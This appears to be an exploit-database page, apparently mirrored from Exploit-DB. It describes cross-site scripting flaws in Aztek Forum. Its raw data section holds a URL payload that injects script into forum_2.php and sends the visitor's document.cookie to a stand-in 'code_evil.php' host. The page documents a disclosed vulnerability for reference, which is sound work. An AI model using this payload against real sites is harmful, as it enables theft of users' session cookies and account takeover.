Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
Aztek Forum Multiple Input Validation Vulnerabilities - exploit.company
header-logo
Suggest Exploit
vendor:
Aztek Forum
by:
Unknown
5.5
CVSS
MEDIUM
Input Validation
Unknown
CWE
Product Name: Aztek Forum
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Aztek Forum Multiple Input Validation Vulnerabilities

The Aztek Forum is prone to multiple input validation vulnerabilities that allow an attacker to carry out cross-site scripting (XSS) and possibly other attacks. These vulnerabilities can be exploited by injecting malicious code into specific parameters.

Mitigation:

The vendor has not released any official patch or mitigation for these vulnerabilities at the moment. It is recommended to avoid using the affected versions of Aztek Forum until a patch is available.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11654/info

Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.

All versions of Aztek Forum are considered vulnerable at the moment.

http://www.example.com/forum%20aztek/forum_2.php?msg=10
&return=')%3C/script%3E%3Cscript%3E%20% 20document.location=%20'www.example.com/code_evil.php?
cookie='%20+window.document.cookie;%20%20%3C/script%3E

Navigation

Suggest Exploit

Services By CQR